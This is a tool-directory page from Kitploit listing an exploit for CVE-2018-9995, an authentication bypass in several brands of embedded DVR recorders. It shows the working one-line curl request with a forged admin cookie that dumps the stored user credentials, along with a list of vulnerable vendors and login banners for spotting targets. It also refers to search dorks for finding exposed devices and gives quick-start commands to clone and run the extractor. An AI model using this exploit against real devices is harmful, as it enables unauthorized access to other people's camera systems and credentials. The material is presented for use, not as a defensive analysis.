Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2018-9995-DVR-Credentials-Extractor — This project demonstrates the publicly disclosed CVE-2018-9995 vulnerability found in multiple embedded DVR devices. | Kitploit
Tools/GitHubGitHub/f7p-h4nn1b4l/cve-2018-9995-dvr-credentials-extractor
Embedded Systems SecurityIoT SecurityVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration TestingAuthentication

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
GitHub
f7p-h4nn1b4l/cve-2018-9995-dvr-credentials-extractor

CVE-2018-9995-DVR-Credentials-Extractor

This project demonstrates the publicly disclosed CVE-2018-9995 vulnerability found in multiple embedded DVR devices.

View Repository
131 month agoNot yet reviewed

[Tool] show DVR Credentiales

root@kitploit:~
[*] Original Tool:       https://github.com/ezelf/CVE-2018-9995_dvr_credentials
[*] Exploit Title:       "Gets DVR Credentials" 
[*] CVE:                 CVE-2018-9995
[*] CVSS Base Score v3:  7.3 / 10
[*] CVSS Vector String:  CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N  
[*] Date:                09/04/2018
[*] Exploit Author:      Fernandez Ezequiel ( twitter:@capitan_alfa )

.

DVR_wall

Exploit:

root@kitploit:~
	$> curl "http://<dvr_host>:<port>/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"

tested in DVR (banner/vendor ?):

root@kitploit:~
Novo
CeNova
QSee
Pulnix
XVR 5 in 1 (title: "XVR Login")
Securus,  - Security. Never Compromise !! - 
Night OWL
DVR Login
HVR Login
MDVR Login

On the Wild:

DVR_dorks_0 DVR_dorks_2 DVR_dorks_1 DVR_dorks_3

Possible Banners frontend (web):

DVR_login_1 DVR_login_2 DVR_login_3 DVR_login_4 DVR_login_5 DVR_login_6 DVR_login_7 DVR_login_8 DVR_login_10

Indoor:

DVR_indoor_1 DVR_indoor_2 DVR_indoor_3 DVR_indoor_4 DVR_indoor_5 DVR_indoor_6 DVR_indoor_7

TOOL: "Show all DVR Credentials"

Quick start

root@kitploit:~
usr@pwn:~$ git clone https://github.com/F7P-H4NN1B4L/CVE-2018-9995-DVR-Credentials-Extractor
usr@pwn:~$ cd CVE-2018-9995-DVR-Credentials-Extractor
usr@pwn:~$ pip install -r requirements.txt
usr@pwn:~$ python main.py

Pocs (Output) :

DVR_poc_4 DVR_poc_3 DVR_poc_2 DVR_poc_1

Blog:

http://misteralfa-hack.blogspot.cl/2018/04/update-dvr-login-bypass-cve-2018-9995.html

I see you... ! xd

Download Tool